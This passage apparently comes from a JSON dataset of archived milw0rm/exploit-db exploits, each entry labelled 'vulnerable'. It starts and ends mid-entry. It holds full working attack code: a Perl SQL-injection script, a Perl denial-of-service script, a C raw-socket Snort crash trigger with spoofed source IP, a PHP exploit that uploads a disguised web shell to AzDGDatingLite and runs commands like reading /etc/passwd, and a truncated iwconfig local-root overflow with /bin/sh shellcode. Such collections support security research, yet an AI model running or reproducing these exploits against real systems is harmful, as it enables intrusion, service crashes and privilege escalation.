application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\\n\";\n\nprint $sock \"Referer: $host\\n\";\n\nprint $sock \"Accept-Language: en-us\\n\";\n\nprint $sock \"Content-Type: application/x-www-form-urlencoded\\n\";\n\nprint $sock \"Accept-Encoding: gzip, deflate\\n\";\n\nprint $sock \"User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox\n\n/1.0.4\\n\";\n\nprint $sock \"X-Forwarded-For: $ip\\n\";\n\nprint $sock \"Connection: Keep-Alive\\n\";\n\nprint $sock \"Cache-Control: no-cache\\n\";\n\nprint $sock \"Content-Length: $lrg\\n\\n\";\n\nprint $sock \"$postit\\n\";\n\nclose($sock);\n\n \n\n \n\nsyswrite STDOUT, \".\";\n\n \n\n \n\n$x++;\n\n}\n\n \n\n## The SQL injection attack  :) \n\n}\n\nelsif ($type == 2){\n\n \n\nprint q(Inyeccion a ejecutar Ejemplo 127.0.0.1'),('<h1>owned</h1>','http://mbytesecurity.\n\norg','leim','hoy','11 );\n\n$sql = <STDIN>;\n\nchop ($sql);\n\n \n\n \n\n \n\nmy $sock = new IO::Socket::INET (\n\n                                 PeerAddr => \"$host\",\n\n                                 PeerPort => \"80\",\n\n                                 Proto => \"tcp\",\n\n                                );\n\ndie \"\\nNo se pudo conectar  :(  $!\\n\" unless $sock;\n\n \n\n \n\nprint $sock \"POST $pth\".\"mensajes.php HTTP/1.1\\n\";\n\nprint $sock \"Host: $host\\n\";\n\nprint $sock \"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q\n\n=0.8,image/png,*/*;q=0.5\\n\";\n\nprint $sock \"Referer: $host\\n\";\n\nprint $sock \"Accept-Language: en-us\\n\";\n\nprint $sock \"Content-Type: application/x-www-form-urlencoded\\n\";\n\nprint $sock \"Accept-Encoding: gzip, deflate\\n\";\n\nprint $sock \"User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox\n\n/1.0.4\\n\";\n\nprint $sock \"Connection: Keep-Alive\\n\";\n\nprint $sock \"Cache-Control: no-cache\\n\";\n\nprint $sock \"Content-Length: $lrg\\n\\n\";\n\nprint $sock \"X-Forwarded-For: $sql\\n\";\n\nclose($sock);\n\n \n\n}else{\n\n \n\n\tdie \"Solo hay 2 opciones IMBECIL\\n\";\n\n}\n\n\n\n# milw0rm.com [2005-09-11]",
1100        "vulnerable": true
1101    },
1102    {
1103        "exploit_id": 1212,
1104        "content": "#!usr/bin/perl\n\n#\n\n#      COOL! Command Execution DOS Exploit\n\n# --------------------------------------------\n\n#      Infam0us Gr0up - Securiti Research\n\n#\n\n# Info: infamous.2hell.com\n\n# Vendor URL: www.yaosoft.com\n\n# \n\n# * If Remote Control(Client application) is running then already connected to server,\n\n#   this command exploit will made Remote Control as Client disconnected from server machine.\n\n#   But if the Remote Control is not currently connected to Remote Server,then\n\n#   by send specified command to Remote Server its allow the server crashed/closed\n\n#\n\n\n\n\n\n$ARGC=@ARGV;\n\nif ($ARGC !=1) {\n\n    print \"Usage: $0 [host]\\n\";\n\n    print \"Exam: $0 127.0.0.1\\n\";\n\n    print \"\\n\";\n\n    exit;\n\n}\n\nuse Socket;\n\n\n\nmy($remote,$port,$iaddr,$paddr,$proto);\n\n$remote=$ARGV[0];\n\n$popy = \"\\x31\\x31\\x39\\x38\\x30\"; \n\n\n\nprint \"\\n[+] Connect to host..\\n\";\n\n$iaddr = inet_aton($remote) or die \"[-] Error: $!\";\n\n$paddr = sockaddr_in($popy, $iaddr) or die \"[-] Error: $!\";\n\n$proto = getprotobyname('tcp') or die \"[-] Error: $!\";\n\n\n\nsocket(SOCK, PF_INET, SOCK_STREAM, $proto) or die \"[-] Error: $!\";\n\nconnect(SOCK, $paddr) or die \"[-] Error: $!\";\n\n\n\nprint \"[+] Connected\\n\";\n\nprint \"[+] Send invalid command..\\n\";\n\n\n\n$empty = \n\n\"\\x49\\x4e\\x46\\x41\\x4d\\x4f\\x55\\x531\".\n\n\"\\x47\\x52\\x4f\\x55\\x50\";\n\n\n\nsend(SOCK, $empty, 0) or die \"[-] Cannot send query: $!\";\n\nsleep(2);\n\nprint \"[+] DONE\\n\";\n\nprint \"[+] Check if server crash!\\n\";\n\nclose(SOCK);\n\nexit;\n\n\n\n# milw0rm.com [2005-09-11]",
1105        "vulnerable": true
1106    },
1107    {
1108        "exploit_id": 1213,
1109        "content": "/*_------------------------------------------_\n\n ||------+ Snort <= 2.4.0 Trigger p0c +------||\n\n ||__________________________________________||\n\n ||--=[ nitrous [at] vulnfact [dot] com  ]=--||\n\n ||--=[      VulnFact Security Labs      ]=--||\n\n ||--=[           21 Ago 2oo5            ]=--||\n\n ||--=[              Mexico              ]=--||\n\n ||__________________________________________||\n\n -__________________________________________-\n\n\n\n Snort <= 2.4.0 SACK TCP Option Error Handling\n\n Este c\u00f3digo envia al  especificado un paquete TCP/IP con 4 bytes extras\n\n correspondientes al campo TCP Options [TCP Header].\n\n Estos 4 bytes son \"\\x05\\x02\\x00\\x00\". NOTA !!!: Snort solamente cae cuando se\n\n esta corriendo en verbose mode (-v).\n\n\n\n Esto solo funciona testeando de una maquina a otra directamente conectadas\n\n (1 solo salto; Ej. En una red LAN de PC a PC). No funciona desde Internet, por\n\n que el campo TCP->th_sum es 0 (cero), por lo tanto, el primer Router por donde\n\n pase este paquete lo descartara por no tener una checksum valida.\n\n\n\n RFC #1072 - TCP Extensions for Long-Delay Paths\n\n\n\n 3.2- TCP SACK Option:\n\n     ...\n\n     Kind: 5\n\n     Length: Variable\n\n     +--------+--------+--------+--------+--------+--------+\n\n     | Kind=5 | Length | Relative Origin |   Block Size    |\n\n     +--------+--------+--------+--------+--------+--------+\n\n\n\n Analizando el packete con 'tcpdump' en OpenBSD 3.5 vemos:\n\n 11:17:53.093264 ip: 127.0.0.1.29383 > 127.0.0.1.80: S 213975407:213975407(0) win 5840\n\n <malformed sack [len 0] ,eol>\n\n 0000: 4500 002c bc4f 0000 ff06 017a 7f00 0001  E..,\u00c5\u2019O..\u00c3\u00bf..z....\n\n 0010: 7f00 0001 72c7 0050 0cc1 016f 43f1 8422  ....r\u00c3\u2021.P.\u00c3\u0081.oC\u00c3\u00b1.\"\n\n 0020: 6002 16d0 3caf 0000 0502 0000            `..\u00c3\u0090<\u00c2\u00af......\n\n\n\n Testeado en:\n\n [+] snort 2.4.0 @ OpenBSD 3.7 GENERIC // Yeah ;)\n\n [+] snort 2.4.0 @ Ubuntu Linux 5.04 \"Hoary Hedgehog\"\n\n [+] snort 2.3.2 @ Debian Linux 3.1 \"Sarge\"\n\n [+] snort 2.3.0 @ Ubuntu Linux 5.04 \"Hoary Hedgehog\"\n\n [+] snort 2.3.0 @ Red Hat Linux 9\n\n [+] snort 2.2.0 @ Ubuntu Linux 5.04 \"Hoary Hedgehog\"\n\n [+] snort 2.0.0 @ OpenBSD 3.5 GENERIC\n\n\n\n Saludos a vulnfact.com, CRAc, stacked, ran, dex, benn, beck, zlotan, Rowter, Gus, Crypkey,\n\n protoloco, Falckon, dymitri, #cum ppl, warlord/nologin.org por fuzzball2 fuzzer, gcarrillog,\n\n JSS, y en especial a Mariit@ ( Sexy Colombiana ;) ). A la musica de \"Sussie 4\" ;)...\n\n Federico L. Bossi Bonin\n\n*/\n\n\n\n#include<stdio.h>\n\n#include<string.h>\n\n#include<unistd.h>\n\n#include<errno.h>\n\n#include<netdb.h>\n\n#include<sys/types.h>\n\n#include<sys/socket.h>\n\n#include<netinet/in.h>\n\n//#define __USE_BSD     1       /* Use BSD's ip header style */\n\n#include<netinet/ip.h>\n\n#define __FAVOR_BSD     1       /* Use BSD's tcp header style */\n\n#include<netinet/tcp.h>\n\n\n\n#define IPSIZE  sizeof(struct ip)\n\n#define TCPSIZE sizeof(struct tcphdr)\n\n#define DEFAULT_SRC_IP  \"200.31.33.70\"\n\n\n\nchar trigger[] = \"\\x05\\x02\\x00\\x00\"; /* Malformed SACK TCP Option */\n\n\n\nint usage(char *name)\n\n{\n\n       fprintf(stderr, \"Usage: %s <target> [spoofed srcip]\\n\", name);\n\n       fprintf(stderr, \"\\t\\tDefault srcip = %s\\n\", DEFAULT_SRC_IP);\n\n\n\n       return 0;\n\n}\n\n\n\nint main(int argc, char **argv)\n\n{\n\n       char *packet= (char *) malloc(IPSIZE + TCPSIZE + 4);\n\n       char *srcip = DEFAULT_SRC_IP;\n\n       int sockfd, count;\n\n       int one = 1; /* setsockopt() */\n\n       struct sockaddr_in target;\n\n       struct hostent *host2ip;\n\n       struct ip *IP = (struct ip *) packet;\n\n       struct tcphdr *TCP = (struct tcphdr *) (packet + IPSIZE);\n\n\n\n       if(argc < 2)\n\n               return(usage(*argv));\n\n\n\n       if(argc == 3)\n\n               srcip = argv[2];\n\n\n\n       if((host2ip = gethostbyname(argv[1])) == NULL){\n\n               perror(\"gethostbyname\");\n\n               exit(-1);\n\n       }\n\n\n\n       if(getuid() != 0){\n\n               fprintf(stderr, \"Ups!, must be r00t to perform RAW sockets\\n\");\n\n               exit(-1);\n\n       }\n\n\n\n       memset(packet, 0x00, sizeof(packet));\n\n\n\n       memset(&target, 0x00, sizeof(target));\n\n       target.sin_family       = AF_INET;\n\n       target.sin_port         = htons(64876);\n\n       target.sin_addr         = *((struct in_addr *)host2ip->h_addr);\n\n\n\n       /*** BUILDING MALFORMED PACKET ***/\n\n       IP->ip_hl       = 0x05;\n\n       IP->ip_v        = 0x04;\n\n       IP->ip_tos      = 0x00;\n\n       IP->ip_len      = IPSIZE + TCPSIZE + 4;\n\n       IP->ip_id       = 0x00;\n\n       IP->ip_off      = 0x00;\n\n       IP->ip_ttl      = 0xff;\n\n       IP->ip_p        = IPPROTO_TCP;\n\n       IP->ip_sum      = 0x00;\n\n       IP->ip_src.s_addr = inet_addr(srcip);\n\n       IP->ip_dst.s_addr = target.sin_addr.s_addr;\n\n\n\n       TCP->th_sport   = htons(31337);\n\n       TCP->th_dport   = target.sin_port;\n\n       TCP->th_seq     = 0x00;\n\n       TCP->th_ack     = 0x00;\n\n       TCP->th_x2      = 0x00;\n\n       TCP->th_off     = 0x06;\n\n       TCP->th_flags   = 0x00; /* NO Syn ;) */\n\n       TCP->th_win     = htons(0xffff);\n\n       TCP->th_sum     = 0x00;\n\n       TCP->th_urp     = 0x00;\n\n\n\n       memcpy(packet + IPSIZE + TCPSIZE, trigger, 4);\n\n       /*** END ***/\n\n\n\n       if((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1){\n\n               perror(\"socket\");\n\n               exit(-1);\n\n       }\n\n\n\n       if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) == -1){\n\n               perror(\"setsockopt\");\n\n               exit(-1);\n\n       }\n\n\n\n       printf(\"-=[ Snort <= 2.4.0 Trigger p0c\\n\");\n\n       printf(\"-=[ By nitr0us <nitrous[at]vulnfact[dot]com>\\n\\n\");\n\n       printf(\"-=[ Sending Malformed TCP/IP Packet...\\n\");\n\n\n\n       if((count = sendto(sockfd, packet, IP->ip_len, 0, (struct sockaddr *)&target, sizeof(target))) == -1){\n\n               perror(\"sendto\");\n\n               close(sockfd);\n\n               exit(-1);\n\n       }\n\n\n\n       printf(\"-=[ Sent %d bytes to %s\\n\", count, argv[1]);\n\n       printf(\"-=[ Snort killed !\\n\");\n\n\n\n       close(sockfd);\n\n       return 0;\n\n}\n\n\n\n// milw0rm.com [2005-09-12]",
1110        "vulnerable": true
1111    },
1112    {
1113        "exploit_id": 1214,
1114        "content": "<?php\n\n#   azdgexpl.php                                                               #\n\n#                                                                              #\n\n#   AzDGDatingLite V 2.1.3 ( possibly prior versions) remote code execution    #\n\n#   with generic http proxy support                                            #\n\n#                                                                              #\n\n#                                by rgod                                       #\n\n#                      site: http://rgod.altervista.org                        #\n\n#                                                                              #\n\n#   make these changes in php.ini if you have troubles                         #\n\n#   to launch this script:                                                     #\n\n#   allow_call_time_pass_reference = on                                        #\n\n#   register_globals = on                                                      #\n\n#                                                                              #\n\n#   usage: launch this script from Apache, fill requested fields, then         #\n\n#   go!                                                                        #\n\n#                                                                              #\n\n#   Sun-tzu: \"Therefore, I say: Know your enemy and know yourself; in a        #\n\n#   hundred battles, you will never be defeated. When you are ignorant         #\n\n#   of the enemy but know yourself, your chances of winning or losing          #\n\n#   are equal. If ignorant both of your enemy and of yourself, you are         #\n\n#   sure to be defeated in every battle.\"                                      #\n\n#                                                                              #\n\n\n\n\n\nerror_reporting(0);\n\nini_set(\"max_execution_time\",0);\n\nini_set(\"default_socket_timeout\", 2);\n\nob_implicit_flush (1);\n\n\n\necho'<head><title>AzDGDatingLite V 2.1.3  remote commands execution</title><meta\n\nhttp-equiv=\"Content-Type\"  content=\"text/html; charset=iso-8859-1\"> <style type=\n\n\"text/css\"> <!-- body,td,th {color:  #00FF00;} body {background-color: #000000;}\n\n.Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif; font-size: 10px; }\n\n.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:  bold;\n\nfont-style: italic; } --> </style></head> <body> <p class=\"Stile6\"> AzDGDatingLi\n\nte V 2.1.3 (possibly prior versions) remote commands execution</p><p class=\"Stil\n\ne6\">a script by rgod at <a href=\"http://rgod.altervista.org\"    target=\"_blank\">\n\nhttp://rgod.altervista.org</a></p><table width=\"84%\"><tr><td width=\"43%\"> <form\n\nname=\"form1\"      method=\"post\"   action=\"'.$SERVER[PHP_SELF].'?path=value&host=\n\nvalue&port=value&command=value&proxy=value&uploaddir=value\"> <p>    <input type=\n\n\"text\" name=\"host\"><span class=\"Stile5\">hostname (ex: www.sitename.com)  </span>\n\n</p><p><input type=\"text\" name=\"path\"><span class=\"Stile5\">  path (ex: /azdg/ or\n\njust /) </span></p><p><input type=\"text\"   name=\"port\" >   <span class=\"Stile5\">\n\nspecify a port other than 80 (default value)  </span></p><p> <input  type=\"text\"\n\nname=\"command\"> <span  class=\"Stile5\"> a Unix command , example: ls -la  to list\n\ndirectories, cat /etc/passwd to show passwd file </span></p><p><input type=\"text\n\n\" name=\"proxy\"> <span class=\"Stile5\"> send exploit through an HTTP proxy (ip:por\n\nt</span></p> <p> <input  type=\"submit\"name=\"Submit\" value=\"go!\"></p></form></td>\n\n</tr></table></body></html>';\n\n\n\nfunction make_seed()\n\n{\n\n   list($usec, $sec) = explode(' ', microtime());\n\n   return (float) $sec + ((float) $usec * 100000);\n\n}\n\n\n\nfunction show($headeri)\n\n{\n\n$ii=0;\n\n$ji=0;\n\n$ki=0;\n\n$ci=0;\n\necho '<table border=\"0\"><tr>';\n\nwhile ($ii <= strlen($headeri)-1)\n\n{\n\n$datai=dechex(ord($headeri[$ii]));\n\nif ($ji==16) {\n\n             $ji=0;\n\n             $ci++;\n\n             echo \"<td>&nbsp;&nbsp;</td>\";\n\n             for ($li=0; $li<=15; $li++)\n\n                      { echo \"<td>\".$headeri[$li+$ki].\"</td>\";\n\n\t\t\t    }\n\n            $ki=$ki+16;\n\n            echo \"</tr><tr>\";\n\n            }\n\nif (strlen($datai)==1) {echo \"<td>0\".$datai.\"</td>\";} else\n\n{echo \"<td>\".$datai.\"</td> \";}\n\n$ii++;\n\n$ji++;\n\n}\n\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\n\n                      { echo \"<td>&nbsp&nbsp</td>\";\n\n                       }\n\n\n\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\n\n                      { echo \"<td>\".$headeri[$li].\"</td>\";\n\n\t\t\t    }\n\necho \"</tr></table>\";\n\n}\n\n\n\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\n\n\n\nfunction sendpacket($packet)\n\n{\n\nglobal $proxy, $host, $port, $html;\n\nif ($proxy=='')\n\n           {$ock=fsockopen(gethostbyname($host),$port);}\n\n             else\n\n           {\n\n\t    if (!eregi($proxy_regex,$proxy))\n\n\t    {echo htmlentities($proxy).' -> not a valid proxy...';\n\n\t     die;\n\n\t    }\n\n\t   $parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $ock=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$ock) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\t   }\n\nfputs($ock,$packet);\n\nif ($proxy=='')\n\n  {\n\n\n\n    $html='';\n\n    while (!feof($ock))\n\n      {\n\n        $html.=fgets($ock);\n\n      }\n\n  }\n\nelse\n\n  {\n\n    $html='';\n\n    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))\n\n    {\n\n      $html.=fread($ock,1);\n\n    }\n\n  }\n\nfclose($ock);\n\necho nl2br(htmlentities($html));\n\n}\n\n\n\nif (($path<>'') and ($host<>'') and ($command<>''))\n\n{\n\n  if ($port=='') {$port=80;}\n\n\n\n# step 1 -> register and upload the evil jpeg file\n\n\n\nsrand(make_seed());\n\n$anumber=rand(10000,99999);\n\n\n\n//do not modify absolutely CRLF and spaces here...\n\n$data='-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"l\"\n\n\n\ndefault\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"a\"\n\n\n\na\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"fname\"\n\n\n\njimihendrix'.$anumber.'\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"lname\"\n\n\n\njimihendrix'.$anumber.'\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"pass\"\n\n\n\njimihendrix'.$anumber.'\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"rpass\"\n\n\n\njimihendrix'.$anumber.'\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"month\"\n\n\n\n11\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"day\"\n\n\n\n27\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"year\"\n\n\n\n1942\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"gender\"\n\n\n\n1\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"purpose\"\n\n\n\n1\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"country\"\n\n\n\n158\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"email\"\n\n\n\njimihendrix'.$anumber.'@hotmail.com\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"url\"\n\n\n\n\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"icq\"\n\n\n\n\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"aim\"\n\n\n\n\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"phone\"\n\n\n\n\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"city\"\n\n\n\n\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"marstat\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"child\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"height\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"weight\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"hcolor\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"ecolor\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"etnicity\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"religion\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"smoke\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"drink\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"education\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"job\"\n\n\n\n\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"hobby\"\n\n\n\n\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"descr\"\n\n\n\nrock star\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"sgender\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"setnicity\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"sreligion\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"agef\"\n\n\n\n14\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"aget\"\n\n\n\n60\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"heightf\"\n\n\n\n1\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"heightt\"\n\n\n\n22\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"weightf\"\n\n\n\n1\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"weightt\"\n\n\n\n45\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"hdyfu\"\n\n\n\n0\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"file0\"; filename=\"jimihendrix.gif\"\n\nContent-Type: image/jpeg\n\n\n\n';\n\n\n\n$shell='<?php error_reporting(0); system($HTTP_GET_VARS[cmd].'.\"'\".' > README'.\"'\".'); ?>';\n\n\n\n$data.=$shell;\n\n\n\n$data.='\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"file1\"; filename=\"\"\n\nContent-Type: application/octet-stream\n\n\n\n\n\n-----------------------------23281168279961\n\nContent-Disposition: form-data; name=\"file2\"; filename=\"\"\n\nContent-Type: application/octet-stream\n\n\n\n\n\n-----------------------------23281168279961--';\n\nif ($proxy=='')\n\n{$packet=\"POST \".$path.\"/add.php HTTP/1.1\\r\\n\";}\n\nelse\n\n{$packet=\"POST http://\".$host.$path.\"add.php HTTP/1.1\\r\\n\";}\n\n$packet.=\"Host: \".$host.\"\\r\\n\";\n\n$packet.=\"User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\\r\\n\";\n\n$packet.=\"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\\r\\n\";\n\n$packet.=\"Accept-Language: en-us,en;q=0.5\\r\\n\";\n\n$packet.=\"Accept-Encoding: gzip,deflate\\r\\n\";\n\n$packet.=\"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\";\n\n$packet.=\"Connection: close\\r\\n\";\n\n$packet.=\"Referer: http://\".$host.$path.\"add.php?l=default\\r\\n\";\n\n$packet.=\"Cookie: PHPSESSID=13798fab78f7fa6e5bb501ac83329bdd\\r\\n\";\n\n$packet.=\"Content-Type: multipart/form-data; boundary=---------------------------23281168279961\\r\\n\";\n\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\n\n$packet.=$data;\n\nshow($packet);\n\nsendpacket($packet);\n\n\n\n#step 2 -> retrieve upload subdir name and filename from index e profile page\n\nif ($proxy=='')\n\n{$packet=\"GET \".$path.\" HTTP/1.0 \\r\\n\";}\n\nelse\n\n{$packet=\"GET http://\".$host.$path.\" HTTP/1.0 \\r\\n\";}\n\n$packet.=\"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\\r\\n\";\n\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\\r\\n\";\n\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n\nshow($packet);\n\nsendpacket($packet);\n\n\n\n$temp='';$i=0;\n\nwhile (!eregi('jimihendrix'.$anumber,$temp))\n\n{\n\n$temp.=$html[$i];\n\n$i=$i+1;\n\nif (eregi('</html>',$temp)) { die(\" Exploit failed... \");}\n\n}\n\n\n\n$temp2=explode('<a href=\"',$temp);\n\n$temp3=count($temp2)-1;\n\n$temp=$temp2[$temp3];\n\n$temp2=explode('\"',$temp);\n\n$profile=$temp2[0];\n\n\n\necho '<br>retrieving shell path from /'.$profile.'<br><br>';\n\n\n\nif ($proxy=='')\n\n{$packet=\"GET \".$path.$profile.\" HTTP/1.0 \\r\\n\";}\n\nelse\n\n{$packet=\"GET http://\".$host.$path.$profile.\" HTTP/1.0 \\r\\n\";}\n\n$packet.=\"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\\r\\n\";\n\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\\r\\n\";\n\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n\nshow($packet);\n\nsendpacket($packet);\n\n\n\n$temp='';$i=0;\n\nwhile (!eregi('jimihendrix'.$anumber,$temp))\n\n{\n\n$temp.=$html[$i];\n\n$i=$i+1;\n\nif (eregi('</html>',$temp)) { die(\" Exploit failed... \");}\n\n}\n\n\n\n$temp2=explode('<a href=\"',$temp);\n\n$temp3=count($temp2)-1;\n\n$temp=$temp2[$temp3];\n\n$temp2=explode('\"',$temp);\n\n$shellfullpath=$temp2[0];\n\n\n\necho '<br>Ok,found... shell is at '.$shellfullpath.'<br><br>';\n\n$temp=explode(\"/\",$shellfullpath);\n\n$temp2=count($temp)-1;\n\n$subdir=$temp[$temp2-1];\n\n$filename=$temp[$temp2];\n\n\n\n# step 3 -> launch commands\n\nif ($proxy=='')\n\n{$packet=\"GET \".$path.\"include/security.inc.php?cmd=\".urlencode($command).\"&l=\".urlencode(\"../../../members/uploads/\".$subdir.\"/\".$filename.chr(0x00)).\" HTTP/1.0 \\r\\n\";}\n\nelse\n\n{$packet=\"GET http://\".$host.$path.\"include/security.inc.php?cmd=\".urlencode($command).\"&l=\".urlencode(\"../../../members/uploads/\".$subdir.\"/\".$filename.chr(0x00)).\" HTTP/1.0 \\r\\n\";}\n\n$packet.=\"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\\r\\n\";\n\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\\r\\n\";\n\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n\nshow($packet);\n\nsendpacket($packet);\n\n\n\n# step 4 -> making a GET request for redirected output\n\necho '<br> if AzDGDatingLite is unpatched and vulnerable now you will see '.htmlentities($command).'output...<br><br>';\n\n\n\nif ($proxy=='')\n\n{$packet=\"GET \".$path.\"include/README HTTP/1.0 \\r\\n\";}\n\nelse\n\n{$packet=\"GET http://\".$host.$path.\"include/README HTTP/1.0 \\r\\n\";}\n\n$packet.=\"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\\r\\n\";\n\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\\r\\n\";\n\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n\nshow($packet);\n\nsendpacket($packet);\n\n}\n\n?>\n\n\n\n# milw0rm.com [2005-09-13]",
1115        "vulnerable": true
1116    },
1117    {
1118        "exploit_id": 1215,
1119        "content": "// (if the iwconfig executable is setuid) /str0ke\n\n\n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <unistd.h>\n\n#include <stdlib.h>\n\n\n\n/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 (https://www.exploit-db.com/exploits/1169/) */\n\nchar shellcode[]=\n\n                 \"\\x31\\xc0\\x31\\xdb\\x50\\x68\\x2f\\x2f\"\n\n                 \"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\"\n\n                 \"\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\"\n\n                 \"\\x0b\\x51\\x52\\x55\\x89\\xe5\\x0f\\x34\"\n\n                 \"\\x31\\xc0\\x31\\xdb\\xfe\\xc0\\x51\\x52\"\n\n                 \"\\x55\\x89\\xe5\\x0f\\x34\";\n\n\n\nint main(int argc,char **argv){\n\n  char buf[96];\n\n  long esp, *addr_ptr;\n\n  unsigned long ret;\n\n  int i, offset;\n\n  unsigned long sp(void)\n\n  { __asm__(\"movl %esp, %eax\");}\n\n  char *prog[]={argv[1],buf,NULL};\n\n  char *env[]={\"3v1lsh3ll0=\",shellcode,NULL};\n\n\n\n  if (argc >= 2) {\n\n    printf(\"\\n*********************************************\\n\");\n\n    printf(\"   iwconfig Version 26 Localroot Exploit    \\n\");\n\n    printf(\"    Coded by Qnix[at]bsdmail[dot]org      \\n\");\n\n    printf(\"*********************************************\\n\\n\");\n\n  } else {\n\n    printf(\"\\n*********************************************\\n\");\n\n    printf(\"   iwconfig Version 26 Localroot Exploit    \\n\");\n\n    printf(\"    Coded by Qnix[at]bsdmail[dot]org      \\n\");\n\n    printf(\"*********************************************\\n\\n\");\n\n    printf(\"\\n USEAGE: ./iwconfig-exploit <iwconfig FULLPATH e.g /sbin/iwconfig or /usr/sbin/iwconfig>\\n\\n\");\n\n    return 1;\n\n    }\n\n\n\n  offset = 0;\n\n  esp = sp();\n\n  ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;\n\n  printf(\"[~] S-p.ESP     : 0x%x\\n\", esp);\n\n  printf(\"[~] O-F.ESP     : 0x%x\\n\", offset);\n\n  printf(\"[~] 